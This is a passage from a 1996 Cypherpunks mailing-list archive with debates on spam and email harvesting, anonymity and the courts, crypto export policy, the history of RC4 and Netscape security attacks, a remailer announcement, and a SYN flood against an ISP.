blessedly short term fad, one that had to be legislated away. I'm completely in favor of allowing junk email, as long as "JUNK MAIL" is required to be the first thing on the subject line. PLONK! ... but that will take yet another law ... - r.w. From rwright at adnetsol.com Thu Sep 12 19:38:50 1996 From: rwright at adnetsol.com (Ross Wright) Date: Fri, 13 Sep 1996 10:38:50 +0800 Subject: Nonsense, absolute nonsense... [Fwd: HipCrime and Spam] Message-ID: <199609122357.QAA24466@adnetsol.adnetsol.com> On Or About: 12 Sep 96 at 17:48, Rabid Wombat wrote: > > > > These people have invited the email, and the associated expense, by placing > > a public email-to: button on their public www page. Correct! > > However, since others may think like you, I guess I'll have to add a line > above my link stating that email not related to the purpose of my site > will be happily proof-read at the rate of $200 per hour, Just great. That sure takes away any anonymity you had about being "on the cutting edge" of the information age. That 1952 "proof-read" crap went out in the 70's. How can you hope to enforce it? It's a joke, right? :) Maybe not, since it's on your sig-line. > > A more acurate analogy, > > and to the point, would be if a business sends you a postage pre-paid > > business reply card, that is blank, and invites your comments on the card. > > They can hardly complain of the expense when people actually send it in, > > even if they don't like the comments. > > No, this b.s. is more like having someone put a dead skunk in my mailbox, > with no return address, trying to prevent me from sending them 100 dead > skunks as a return favor. And about as welcome. > Sorry, Wombat. As much as I hate to agree with this multi level long distance phone company spammer. He is right. A website is an open invitation to comment and e-mail. Better password your site if you want to solve this problem. Then no-one can visit it, and no-one can send out a spider to get your e-mail address. That's what I do, send out a robot to bring back e-mail addresses. Of course I only send to makers of software, and my product applys to their world. If you don't want spam in your mail box: 1. Don't have a website or don't put your e-mail address on your website 2. Don't post to newsgroups 3. Don't post to mailing lists 4. If you post do so anonymously Ross =========== Ross Wright King Media: Bulk Sales of Software Media and Duplication Services http://www.slip.net/~cdr/kingmedia Voice: 415-206-9906 From minow at apple.com Thu Sep 12 19:53:13 1996 From: minow at apple.com (Martin Minow) Date: Fri, 13 Sep 1996 10:53:13 +0800 Subject: Observer's defense of "Internet Pornography" article Message-ID: If you haven't overdosed on the Observer articles yet, you can read their defense on http://www.observer.co.uk -- it is rather self-serving, but it could have been worse. The only revelation is that Demon (the major Internet provider) plans to block access to some newsgroups/sites. Also, assuming I read between the lines correctly, Demon receives three billion (with a "b") e-mail messages per day. I can never remember whether British usage is "thousand million," or "million million", but the numbers seem a bit large in any case. Perhaps they mean "3 billion bytes of e-mail." (Assume ten million Demon subscribers and three thousand million e-mail messages. This implies that the average subscriber receives 300 e-mail messages per day. Are they all subscribing to Cypherpunks?) Some other numbers: -- 180,000 newsgroup articles received per-day (per server). -- "tens of terabytes of data, (each equivalent to 750,000 floppy disks) move across a network of about 10 million machines." This seesm to refer to all of the Internet. Martin Minow minow at apple.com From unicorn at schloss.li Thu Sep 12 20:11:28 1996 From: unicorn at schloss.li (Black Unicorn) Date: Fri, 13 Sep 1996 11:11:28 +0800 Subject: Sen. Burns' statement on postponement of Crypto vote today. In-Reply-To: Message-ID: On Thu, 12 Sep 1996, Robert Hettinga wrote: > --- begin forwarded text > > > From: somebody > Date: Thu, 12 Sep 1996 15:03:21 -0400 > To: rah at shipwright.com > Subject: Re: Sen. Burns' statement on postponement of Crypto vote today. > > Robert-- > My sources indicate that no markup will be > held on the Burns bill before Congress adjourns for year. Concur. -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From rwright at adnetsol.com Thu Sep 12 20:12:53 1996 From: rwright at adnetsol.com (Ross Wright) Date: Fri, 13 Sep 1996 11:12:53 +0800 Subject: mailing lists Message-ID: <199609130029.RAA25390@adnetsol.adnetsol.com> On Or About: 12 Sep 96 at 18:11, Rabid Wombat wrote: > > > more restricted. I'm personally against needing to pay the social costs of > > more and more laws because someone is trying to make a buck any way he > > can, regardless of the costs and annoyances to others. > > > > Junk faxing was a blessedly short term fad, one that had to be legislated > > > > I'm completely in favor of allowing junk email, as long as "JUNK MAIL" is > > required to be the first thing on the subject line. PLONK! ... but that > > will take yet another law ... > Wombat: If you are "against needing to pay the social costs of more and more laws" Then how come you want another one? > IE," as long as "JUNK MAIL" is required to be the first thing on > the subject line. PLONK! >... but that will take yet another law > > ... "! One more law to pay for, one foot in the door for the government. Don't call for new legislation in order to not get spam! Please. Ross =========== Ross Wright King Media: Bulk Sales of Software Media and Duplication Services http://www.slip.net/~cdr/kingmedia Voice: 415-206-9906 From gbroiles at netbox.com Thu Sep 12 20:21:36 1996 From: gbroiles at netbox.com (Greg Broiles) Date: Fri, 13 Sep 1996 11:21:36 +0800 Subject: Fed appellate judge remarks re anonymity, free speech on the net Message-ID: <2.2.32.19960913004019.006df548@pop.ricochet.net> The Daily Journal, a LA/SF legal newspaper had an article today (9/12) about a lunchtime address given by Ninth Circuit Judge Alex Kozinski last Monday at an Internet Law Symposium in Seattle. The article quotes Kozinski as saying "I have a severe problem with anonymous E-mailers . . . You don't have a right to walk up to somebody's door and knock with a bag over your head." The article says Kozinski likened anonymous E-mail to menacing someone. Kozinski also suggested that computer-generated or morphed images of children involved in sexual acts may not be protected under the Constitution because of ongoing trauma to the child, while computer-generated or morphed images of adults would be protected. The article says that Kozinski was skeptical that he or other federal judges necessarily agreed with the 3rd Circuit's ruling in _ACLU v. Reno_ (finding the CDA unconstitutional). Kozinski is considered relatively conservative and relatively libertarian, as 9th Circuit judges go. Copies of the Daily Journal should be available at larger newsstands in CA; interested parties might try DeLauer's on Broadway near 14th St in Oakland if you're in my neck of the woods. (They usually have extras for the preceding week or so.) Also try Barnes & Noble in Santa Monica or the newsstand whose name escapes me in Westwood, if you're down there. (Also in today's news, the 9th Circuit upheld a CA statute forbidding sales of material considered "harmful to minors" from vending machines.) -- Greg Broiles | "We pretend to be their friends, gbroiles at netbox.com | but they fuck with our heads." http://www.io.com/~gbroiles | | From robert at precipice.v-site.net Thu Sep 12 20:25:43 1996 From: robert at precipice.v-site.net (HipCrime) Date: Fri, 13 Sep 1996 11:25:43 +0800 Subject: who can count? Message-ID: <3238B18E.7211@precipice.v-site.net> > No, this b.s. is more like having someone put a dead skunk in my > mailbox, with no return address, trying to prevent me from sending > them 100 dead skunks as a return favor. And about as welcome. 100 dead skunks in exchange for ONE is exactly what this discussion is all about. You CypherWIMPS just love over-kill. EmailRobot sent ONE message to EACH address. Are you guys so unskilled in arithmetic to understand the difference between 1 and 100? One message is NOT spam, 100 messages to a single box IS spamming. -- HTTP://www.HIPCRIME.com From hallam at ai.mit.edu Thu Sep 12 20:32:09 1996 From: hallam at ai.mit.edu (Hallam-Baker) Date: Fri, 13 Sep 1996 11:32:09 +0800 Subject: SPL -- Suspicious Persons List In-Reply-To: <512ja2$oko@life.ai.mit.edu> Message-ID: <3238B073.2847@ai.mit.edu> Timothy C. May wrote: > > Digitaltronics Corporation V.P of Human Relations: "Joe, thanks for coming > in this morning. I'm sure you're busy, so I'll make this as short as > possible. OK with you?" > > Joseph Shlubsky, Programmer: "Uh, sure." Yeah, thats why we Europeans have labour laws that prevent Digitaltronics from doing any such thing without getting sued from here to eternity. Pity you guys missed out on the idea of trades unions and think that employment is some kind of serfdom in which you loose all your rights the day you sign up. If you hadn't sold your government to the cooprorations a while back you might have got out of the middle ages. I suspect that even under the weak as dishwater employment laws that you have in the US would provide ample opportunity to file a countersuit. When that type of thing happens, they don't give the reason, they do it behind closed doors. How do you fight that? Phill From wombat at mcfeely.bsfs.org Thu Sep 12 20:35:52 1996 From: wombat at mcfeely.bsfs.org (Rabid Wombat) Date: Fri, 13 Sep 1996 11:35:52 +0800 Subject: Nonsense, absolute nonsense... [Fwd: HipCrime and Spam] In-Reply-To: <199609122357.QAA24466@adnetsol.adnetsol.com> Message-ID: > > > > However, since others may think like you, I guess I'll have to add a line > > above my link stating that email not related to the purpose of my site > > will be happily proof-read at the rate of $200 per hour, > > Just great. That sure takes away any anonymity you had about being > "on the cutting edge" of the information age. That 1952 "proof-read" > crap went out in the 70's. How can you hope to enforce it? It's a > joke, right? :) Maybe not, since it's on your sig-line. > It was sarcasm. I don't hope to enforce it. And I don't have a sig-line. > > Sorry, Wombat. As much as I hate to agree with this multi level > long distance phone company spammer. He is right. A website is an > open invitation to comment and e-mail. Better password your site if > you want to solve this problem. Then no-one can visit it, and no-one > can send out a spider to get your e-mail address. That's what I do, > send out a robot to bring back e-mail addresses. Of course I only > send to makers of software, and my product applys to their world. > Comment is one thing. Mass junk mail is another. I'd view "comment" as expressing an opinion. If I put an "email to:" tag on a web site, I'm inviting "comment" on the information I've placed in public view - there's reasonable expectation that the "comment" will be pertinent, even if it is only "Your automated gif sucks." This isn't quite the same as inviting completely irrelevent junk mail, and I still fail to see how you make this leap of logic. You are on a public mailing list, aren't you? You have some degree of expectation as to the pertinence of topics discussed on said list, don't you? Even if it is c'punks? The same holds true for newsgroups. The vast majority of 'net users dislike off-topic discussion; they subscribe to mailing lists and newsgroups to discuss topics of relevence and mutual interest. It is highly self-centered of you to assume the "right" to waste their time with unwanted and completely off-topic communication. > If you don't want spam in your mail box: > > 1. Don't have a website or don't put your e-mail address on your > website 1a. Set up a robots.txt file. See http://www.info.webcrawler.com. Polite robots will comply, though I doubt spammers building mailing lists will be polite. > 2. Don't post to newsgroups 2a. Actively exercise YOUR freedom of speech to disuade spammers. Contact their ISP. Forward a complete copy of the spam; this lets the ISP see what's being sent where, and fills up their mail spool too. Most ISPs will decide that the spammer can take his/her business elsewhere. > 3. Don't post to mailing lists > 4. If you post do so anonymously Oh, so now I MUST remain anonymous, or I invite any and all correspondence regardless of relevence. Seems like your exercising of your rights is compromising mine. Laws restrict freedom. They determine what we cannot do without fear of penalty. Some individuals exercise their "right" to freedom of action to the extent that they harm others. This causes those "others" to willingly/grudgingly give up some of their own freedom of action in exchange for protection. When you exercise your "right" to free speech to the extent that you piss off a large segment of society, society will react by reducing its measure of freedom of speech. You have a right to speak your message, but you do not have the right to spray-paint it on the wall of my house. You may broadcast your message on the airwaves, but are subject to some restrictions. You once enjoyed the "right" to fax anything you wanted to send to my fax machine. Enough junk mail was sent to enough fax machines, and now many jurisdictions have another LAW restricting this behavior. I don't want to see legislation come to the 'net, but it will, and your attitude hastens it. The long-term result of your abuse of your "right" to free speech is the invitation of government meddling into my right to free speech. - r.w. From perry at piermont.com Thu Sep 12 21:05:07 1996 From: perry at piermont.com (Perry E. Metzger) Date: Fri, 13 Sep 1996 12:05:07 +0800 Subject: SPL -- Suspicious Persons List In-Reply-To: <3238B073.2847@ai.mit.edu> Message-ID: <199609130114.VAA08507@jekyll.piermont.com> Hallam-Baker writes: > Pity you guys missed out on the idea of trades unions and think that > employment is some kind of serfdom in which you loose all your > rights the day you sign up. If you hadn't sold your government to > the cooprorations a while back you might have got out of the middle > ages. Yes, we could be a workers paradise like one of those lovely European countries with double digit unemployment and all. Too bad we didn't go in for democratic socialism while we could have, eh? Perry From aba at dcs.ex.ac.uk Thu Sep 12 21:09:32 1996 From: aba at dcs.ex.ac.uk (Adam Back) Date: Fri, 13 Sep 1996 12:09:32 +0800 Subject: [Long] A history of Netscape/MSIE problems In-Reply-To: <84245818912499@cs26.cs.auckland.ac.nz> Message-ID: <199609120716.IAA00231@server.test.net> Peter Guttmann writes on cpunks: > [...] The reason for the 40-bit key and (according to RSADSI, the > company that developed RC4) the reason why details on it were kept > secret was that these conditions were required under an agreement > between the Software Publishers Association (SPA) and the US > government which gave special export status to the RC4 algorithm and > a companion algorithm called RC2. Hadn't heard that before, that the trade secret requirement was imposed on RSADSI. What was your source for that info, it is an interesting assertion on the part of RSADSI, and I am intrigued. > [reverse engineer of RC4...] > The results were posted to mailing lists and the Internet [Anon > 1994a]. Someone with a copy of BSAFE tested it against the real > thing and verified that the two algorithms produced identical > results [Rescorla 1994], and someone else checked with people who > had seen the original RC4 code to make sure that it had been > (legally) reverse-engineered rather than (illegally) copied [Anon > 1994b]. Some people held that it had been a licensed holder of RC4 source who had posted it in violation of the license agreement. I think I recall that Tim May, may be others, argued this nearer the time. That the code looked different isn't of itself proof that it was or wasn't reverse engineered; it is entirely plausible for the anonymous poster (if it was a source license violation) to have gone to some pains to obscure this fact, by changing the appearance and style of the code. > [RC4 key schedule biases...] You ought to reference Andrew Roos paper [posted to the list, and sci.crypt, at least] analysing key schedule biases in RC4. Paul Kocher posted a response (this was in sci.crypt) saying that he had discovered the same biases while working for RSADSI, (at a time before RC4 was revealed, or at least before RSADSI started discussing RC4 publically, a tacit admission by them that alleged RC4 was RC4) > Further improvements to the attack were proposed. Andrew Roos brutessl code was special case optimised for SSL, he precomputed part of the MD5 digest, and progressed through the key space in an order chosen to maximise the amount of MD5 precomputation that could be done. Something of interest, perhaps. > The attacks on RC4 are a prime example of a publicity attack. They were > carried out by volunteers using borrowed machine time, noone (apart from > Netscapes stock prices) was harmed, Strangly (I'm not sure if anyone lost money due to this), I think Netscapes prices hardly suffered, perhaps even improved slightly. Could be due to the `any publicity is good publicity' syndrome. There was a *lot* of publicity, and Netscapes response in fixing the problem was good. Several US cypherpunks were tracking the stocks at the time, and could probably verify this. One omission: you didn't say anything about Paul Kocher's timing attack on RSA, which I think affected Netscape servers, and was fixed after his publicizing the attack. Then you could discuss Ron Rivest's blinding solution, and the time delay solution. Otherwise, excellent. Adam -- #!/bin/perl -sp0777i At 9:48 PM 9/12/96, Rabid Wombat wrote: >> >> These people have invited the email, and the associated expense, by placing >> a public email-to: button on their public www page. > > >Most people put up an "email to:" button on a public page for >communications related to what's on the page. It's quite a stretch to >assume that this invites any and all email from anyone who cares to send >whatever they want. I can't say I've ever seen one that said "Please send >SPAM(tm) to:" ... But to attempt to define "SPAM" (unless you're Armour) is dangerous. This whole notion of "unwanted mail" is ill-defined and not something "the law" should get involved in, in my view. (And CP technologies certainly are consistent with this, e.g., placing the role of screening on those who set up gates, not on tracking down True Names for prosecution.) >However, since others may think like you, I guess I'll have to add a line >above my link stating that email not related to the purpose of my site >will be happily proof-read at the rate of $200 per hour, 1 hour per 60 >lines, minimum. Perhaps I'll get lucky. If I get a big enough chunk of >SPAM(tm), it might be worth the costs of breaking down the anonymity. As the legal eagles will tell you, the essence of a contract is a two-way agreed upon set of terms, not a one-way "if you send me mail I decide I don't want, you will have incurred a charge of $1000." Try enforcing your $200 an hour "proofreading charge" in any court in the land. (I've been saying this thing for several years. Who knows, maybe Rabit Wombat was the first to use it. Whatever, it's as unenforceable and meaningless now as it was several years ago.) >No, this b.s. is more like having someone put a dead skunk in my mailbox, >with no return address, trying to prevent me from sending them 100 dead >skunks as a return favor. And about as welcome. In the case of actual USPS mailboxes, there are laws which prevent others from using them (e.g., no UPS or FedEx deliveries). For sure, dead skunks can be placed in mailboxes, or under porches, or whatever. The law can't fix everything. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From robert at precipice.v-site.net Thu Sep 12 21:16:56 1996 From: robert at precipice.v-site.net (HipCrime) Date: Fri, 13 Sep 1996 12:16:56 +0800 Subject: Nonsense, absolute nonsense... [Fwd: HipCrime and Spam] In-Reply-To: Message-ID: <3238BD18.64F8@precipice.v-site.net> > I'd view "comment" as expressing an opinion. If I put an "email to:" > tag on a web site, I'm inviting "comment" on the information I've > placed in public view A message sent to a MAILTO button on a WebPage, which contains the URL of another WebPage is EXACTLY on-topic. It's my belief that any active "webmistress" would be interested in what other sites have to offer. -- HTTP://www.HIPCRIME.com From macgyver at colphi.edu.ar Thu Sep 12 21:17:17 1996 From: macgyver at colphi.edu.ar (MacGyver) Date: Fri, 13 Sep 1996 12:17:17 +0800 Subject: Security technical list Message-ID: <409if995@colphi.edu.ar> [pgp sign clear] Anybody could help me to find a mail list of security,crypto,etc?? Regards From tcmay at got.net Thu Sep 12 21:18:02 1996 From: tcmay at got.net (Timothy C. May) Date: Fri, 13 Sep 1996 12:18:02 +0800 Subject: Morph Escrow Message-ID: At 12:40 AM 9/13/96, Greg Broiles wrote: >Kozinski also suggested that computer-generated or morphed images of >children involved in sexual acts may not be protected under the Constitution >because of ongoing trauma to the child, while computer-generated or morphed >images of adults would be protected. Hence the proposal for "morph escrow": "Upon presentation of a valid court order or Presidential Decision Directive, a complete morph history of any image deemed possibly of prurient interest must be presented to law enforcement." As the law cannot tell if an image of prurient interest started out as a legal image of Raquel Welch or Jennifer Aniston, or started out as an illegal image of a minor child, morph escrow will force all image possessors and distributors to produce proof that the image started out legal. Failure to escrow morph histories, or possession of an image with an authorized morph history escrow certificate, is punishable by not less than six months in jail. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From sameer at c2.net Thu Sep 12 21:19:13 1996 From: sameer at c2.net (sameer) Date: Fri, 13 Sep 1996 12:19:13 +0800 Subject: [Long] A history of Netscape/MSIE problems In-Reply-To: <199609120716.IAA00231@server.test.net> Message-ID: <199609130137.SAA27304@lachesis.c2.net> > > Hadn't heard that before, that the trade secret requirement was > imposed on RSADSI. What was your source for that info, it is an > interesting assertion on the part of RSADSI, and I am intrigued. An RSA employee told me this once, unofficially. (Not that this makes it true, mind you) -- Sameer Parekh Voice: 510-986-8770 C2Net FAX: 510-986-8777 The Internet Privacy Provider http://www.c2.net/ sameer at c2.net From ravage at einstein.ssz.com Thu Sep 12 21:20:40 1996 From: ravage at einstein.ssz.com (Jim Choate) Date: Fri, 13 Sep 1996 12:20:40 +0800 Subject: Fed appellate judge remarks re anonymity, free speech on the (fwd) Message-ID: <199609130147.UAA01876@einstein> Forwarded message: > Date: Thu, 12 Sep 1996 17:40:19 -0700 > From: Greg Broiles > Subject: Fed appellate judge remarks re anonymity, free speech on the > net > > The article quotes Kozinski as saying "I have a severe problem with > anonymous E-mailers . . . You don't have a right to walk up to somebody's > door and knock with a bag over your head." The article says Kozinski likened > anonymous E-mail to menacing someone. I guess the esteemed judge doesn't believe in Halloween.... Does this also mean that he supports the complete elimination of junk mail that has no return address on it? > Kozinski is considered relatively conservative and relatively libertarian, > as 9th Circuit judges go. Conservative AND Libertarian? Talk about a non-sequitar. Jim Choate ravage at ssz.com From tcmay at got.net Thu Sep 12 21:21:38 1996 From: tcmay at got.net (Timothy C. May) Date: Fri, 13 Sep 1996 12:21:38 +0800 Subject: Reputation Systems in Action Message-ID: At 6:41 PM 9/11/96, paul at fatmans.demon.co.uk wrote: >> tcmay at got.net (Timothy C. May) writes: >> > As to "tasteless and insulting," a matter of personal perspective. I find >> > it helpful to call a spade a spade, and others apparently do as well. >> > >> >> Of course, Tim gets very uncomfortable when others call a spade a spade. > > >This constant character assasination of Tim is getting rather boring, >as far as I can see, and I read all of the posts on the list, he has >done nothing more than ignore posts from these idiots, that is his >choice and nothing to do with anyone else. But this latest episode illustrates the role of reputations. Namely, my own reputation is not being harmed by bizarre commentaries from the Vulis-bot. As its reputation is (apparently) pretty low, and associated with Serdar Ardic-style rants about "sovoks," "the cabal," and "spit," such an entity can hardly "assassinate" my character. A few years ago Larry Detweiler, aka "vznuri" ("visionary"), aka "S.Boxx," aka "Pablo Escobar," aka several other alternate personalities, wrote dozens of screeds denouncing me, Eric Hughes, Nick Szabo, Hal Finney, etc. Did this have an effect on our reputations? Not to people I respected, of course. And if Detweiler's rants affected my reputation with his peers, including Dimitri Vulis, Ludwig Plutonium, Doctress Neutopia, Serdar Argic, well, this is to the good. In the mathematics of reputations, a negative reputation held by one whose own reputation is negative is a positive. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From gcooke at Rt66.com Thu Sep 12 21:46:35 1996 From: gcooke at Rt66.com (Gregg Cooke) Date: Fri, 13 Sep 1996 12:46:35 +0800 Subject: What is best policy paper on crypto? Message-ID: At 6:07 PM 9/12/96, Hallam-Baker wrote: >Adam Shostack wrote: >> >> Declan McCullagh wrote: >> | I happen to know that an influential Congresspern will be meeting with >> | some Cato folks tomorrow morning, so I'm assuming this isn't an idle >> | request. [ . . . ] > >> The NAS report, despite a few silly points, does push for >> liberalization of the export regime, standardization, a switch to [ . . . ] > >I agree that the NAS report is the one to use. Its from an authoratative >source and the conclusions are pretty reasonable. Its perhaps not as far [ . . . ] I'm gonna stick my neck out here and ask a naive question: where can I find "the NAS report" mentioned in this thread? Note that I'm new to this list (2 days) so please be kind if this paper is extremely well known (it's not known to me but it sounds like something I need to read). -Gregg From wb8foz at nrk.com Thu Sep 12 22:19:38 1996 From: wb8foz at nrk.com (David Lesher) Date: Fri, 13 Sep 1996 13:19:38 +0800 Subject: Sen. Burns' statement on postponement of Crypto vote today. In-Reply-To: Message-ID: <199609122356.TAA01893@nrk.com> Robert Hettinga sez: > From: somebody > Administration in next two > weeks will unveil its "new and improved" encryption policy, which will likely > offer a shift in licensing to Commerce Dept., and gradual easing of > exportable strength, in exchange for industry-funded key escrow management > demo projects. I hear that the Feebs and DOJ are upset that they do not have enough pull in NSA/Commerce decisions; and wants to get in the middle of process. Industry is screaming over that. Of course, Feebs et.al have not legal standing in ITAR decisons, but that's not stopped 'em before.... -- A host is a host from coast to coast.................wb8foz at nrk.com & no one will talk to a host that's close........[v].(301) 56-LINUX Unless the host (that isn't close).........................pob 1433 is busy, hung or dead....................................20915-1433 From WlkngOwl at unix.asb.com Thu Sep 12 23:03:49 1996 From: WlkngOwl at unix.asb.com (Deranged Mutant) Date: Fri, 13 Sep 1996 14:03:49 +0800 Subject: Bubba Bottoming out on Cocaine Paranoia? Message-ID: <199609130148.VAA15888@unix.asb.com> No comments about Bubba, Joe Sixpack, the NWO, Greys, Reds, Greens, those on the dole or those high on Dole.... Just notice the strange contradiction below: =WIRED WORLD WILL "DIMINISH NATIONAL SOVEREIGNTY" [..] =when the whole world is "wired" and e-cash is the norm. The result =will be less powerful governments in relation to criminal =organizations such as the Mafia and international drug cartels, says =Michael Nelson, who adds that organized crime members are already =some of the most sophisticated users of computer systems and strong =encryption technology. ... Ok, the "bad guys" will use sophisticated security devices... but below, apparently the "good guys" don't use the same sophisticated tech, and therefore are at an even greater risk from another set of "bad guys"... = ... In addition, computer crackers will pose a =more significant threat. In response, Nelson advocates resolving the =issue of whether unauthorized access of a computer is an "act of =trespass" or an "act of war," and prosecuting the intrusions =accordingly. (BNA Daily Report for Executives 6 Sep 96 A14) = (Courtesy of Edupage) --- No-frills sig. Befriend my mail filter by sending a message with the subject "send help" Key-ID: 5D3F2E99 1996/04/22 wlkngowl at unix.asb.com (root at magneto) Send a message with the subject "send pgp-key" for a copy of my key. From tcmay at got.net Thu Sep 12 23:21:45 1996 From: tcmay at got.net (Timothy C. May) Date: Fri, 13 Sep 1996 14:21:45 +0800 Subject: Fed appellate judge remarks re anonymity Message-ID: At 1:47 AM 9/13/96, Jim Choate wrote: >Forwarded message: > >> Date: Thu, 12 Sep 1996 17:40:19 -0700 >> From: Greg Broiles >> Subject: Fed appellate judge remarks re anonymity, free speech on the >> net >> >> The article quotes Kozinski as saying "I have a severe problem with >> anonymous E-mailers . . . You don't have a right to walk up to somebody's >> door and knock with a bag over your head." The article says Kozinski likened >> anonymous E-mail to menacing someone. > >I guess the esteemed judge doesn't believe in Halloween.... Actually, seven of the children who came before his court on this charge are still in prison. He sentenced them to between 4 and 7 years. (By the way, some communities have made it illegal for adults to be out by themselves when children are "trick-or-treating." Typically, the laws are vague and are used for harassment, not actual prosecution. And I rather doubt that the costume I plan to wear to Sandy Sandfort's party--"Jeffrey Dahmer," with a bag over my shoulder and what appear to be severed limbs sticking out of the bag--would be "acceptable" to local cops.) --Tim "The Unadahmer" May (I blow up my victims and then cook the pieces) We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From jgrasty at gate.net Thu Sep 12 23:23:24 1996 From: jgrasty at gate.net (Joey Grasty) Date: Fri, 13 Sep 1996 14:23:24 +0800 Subject: WinSock Remailer Accepting Only PGP Messages Starting September Message-ID: <199609130213.WAA113878@osceola.gate.net> Y'all: Due to the large number of inconsiderate users and spammers, the vast majority of whom do not use PGP, we are changing the operation of the WinSock Remailer at winsock at c2.org to accept only incoming messages that are encrypted with PGP. This change will become effective September 16, 1996 at 9:00 PM EDT. On a brighter note, a new release of the WinSock Remailer will be available on September 17. In addition to bug fixes, a number of new features have been added including: - support for shared or exclusive POP account (the operator will be able to operate the remailer from his personal account; messages without proper remail headers will be left in the mail spool for retrieval with any other POP mail client). - support for changing the outgoing message pool size on the Outgoing Mail dialog box. - remailer now accepts "help" in addition to "remailer-help" to retrieve the help file for the remailer. A large number of help requests were piling up in the reject directory, so this should cure that problem. And yes, the bug that prevented the remailer from operating in PGP Only mode, has been fixed. :-) Regards, Joey Grasty (jgrasty at gate.net) Jim Ray (liberty at gate.net) WinSock Remailer Operators From zachb at netcom.com Thu Sep 12 23:55:28 1996 From: zachb at netcom.com (Z.B.) Date: Fri, 13 Sep 1996 14:55:28 +0800 Subject: who can count? In-Reply-To: <3238B18E.7211@precipice.v-site.net> Message-ID: On Thu, 12 Sep 1996, HipCrime wrote: > > No, this b.s. is more like having someone put a dead skunk in my > > mailbox, with no return address, trying to prevent me from sending > > them 100 dead skunks as a return favor. And about as welcome. > > 100 dead skunks in exchange for ONE is exactly what this discussion > is all about. You CypherWIMPS just love over-kill. EmailRobot sent > ONE message to EACH address. Are you guys so unskilled in arithmetic > to understand the difference between 1 and 100? > It doesn't matter if you get one or one hundred messages - both are still annoying as hell. If I wanted whatever you're advertising or selling, I'd come look for it. I'd prefer that you not mail me. --- Zach Babayco zachb at netcom.com <----- finger for PGP public key http://www.geocities.com/SiliconValley/Park/4127 From perry at piermont.com Thu Sep 12 23:57:55 1996 From: perry at piermont.com (Perry E. Metzger) Date: Fri, 13 Sep 1996 14:57:55 +0800 Subject: PANIX.COM down: denial of service attack In-Reply-To: <199609130334.AA161125684@relay.hp.com> Message-ID: <199609130408.AAA09629@jekyll.piermont.com> M C Wong writes: > > For those who are IP hackers, the problem is that we're > > being flooded with SYNs from random IP addresses on > > our smtp ports. We are getting on average 150 packets > ^^^^ > > Can't access to this port be guarded against by a filtering > router which is configured to accept *only* a number of > trusted MX hosts ? Sure -- if you only want to accept mail from fifteen machines on earth. If on the other hand your users might get mail from anywhere on earth, your mail ports have to be open to connections from anywhere. .pm From rittle at comm.mot.com Thu Sep 12 23:58:15 1996 From: rittle at comm.mot.com (Loren James Rittle) Date: Fri, 13 Sep 1996 14:58:15 +0800 Subject: [Long] A history of Netscape/MSIE problems In-Reply-To: <199609120716.IAA00231@server.test.net> Message-ID: <9609130448.AA21647@supra.comm.mot.com> >Date: Thu, 12 Sep 1996 08:16:47 +0100 >From: Adam Back >> The attacks on RC4 are a prime example of a publicity attack. They were >> carried out by volunteers using borrowed machine time, noone (apart from >> Netscapes stock prices) was harmed, >Strangly (I'm not sure if anyone lost money due to this), I think >Netscapes prices hardly suffered, perhaps even improved slightly. >Could be due to the `any publicity is good publicity' syndrome. There >was a *lot* of publicity, and Netscapes response in fixing the problem >was good. Several US cypherpunks were tracking the stocks at the >time, and could probably verify this. I have been tracking Netscape stock closely since the IPO. I can safely say that Netscape stock didn't suffer one iota when the news reports of the cypherpunks' attacks hit the papers. I agree with Adam, Netscape stock generally rose (err, skyrocketed would be a better word) the entire time of the cypherpunks incidents. [Anyone can verify this analysis by comparing the chart at http://www.stockmaster.com/sm/g/N/NSCP.html with the dates of the cypherpunks incidents (all important dates in 1995 by my records).] Netscape's stock price has generally fallen since these incidents, but this was obviously (if anything is obvious when it comes to matching stock price swings to real events :-) caused by increased general market pressure and, quite importantly, the fact that Microsoft was able to deliver a reasonable product with which to compete with Netscape in such a timely fashion. I think even close Microsoft watchers were surprised by the Microsoft's speed to market with something quite decent. In retrospect, none of this surprises me. The stock's fall from grace was predicted (at least by myself), just the exact timing for the fall was far different than I expected. None of this is to say anything about a Netscape fall from grace, as a company. They make great product, but the skyrocketing stock price after the IPO made no sense to me. Anyone that looked closely at the IPO model (early investors got *huge* chunks of shares at mere pennies/share) and the evolution of the software market should have been able to plainly see that $170/share for Netscape (pre-split price hit early Dec 1995 and late Jan 1996) is insane. I wonder who bought at $170? Regards, Loren -- Loren J. Rittle (rittle at comm.mot.com) PGP KeyIDs: 1024/B98B3249 2048/ADCE34A5 Systems Technology Research (IL02/2240) FP1024:6810D8AB3029874DD7065BC52067EAFD Motorola, Inc. FP2048:FDC0292446937F2A240BC07D42763672 (847) 576-7794 Call for verification of fingerprints. Of course, these are my opinions, not Motorola's. From wombat at mcfeely.bsfs.org Fri Sep 13 00:04:29 1996 From: wombat at mcfeely.bsfs.org (Rabid Wombat) Date: Fri, 13 Sep 1996 15:04:29 +0800 Subject: who can count? In-Reply-To: <3238B18E.7211@precipice.v-site.net> Message-ID: On Thu, 12 Sep 1996, HipCrime wrote: > > No, this 